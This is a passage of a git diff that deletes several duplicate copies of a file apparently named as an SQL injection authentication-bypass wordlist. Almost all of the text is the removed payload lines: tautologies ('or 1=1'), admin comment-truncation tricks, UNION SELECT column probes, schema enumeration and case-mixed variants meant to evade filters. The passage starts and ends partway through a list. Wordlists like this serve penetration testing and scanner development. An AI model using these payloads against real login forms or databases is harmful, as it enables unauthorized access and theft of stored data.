-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
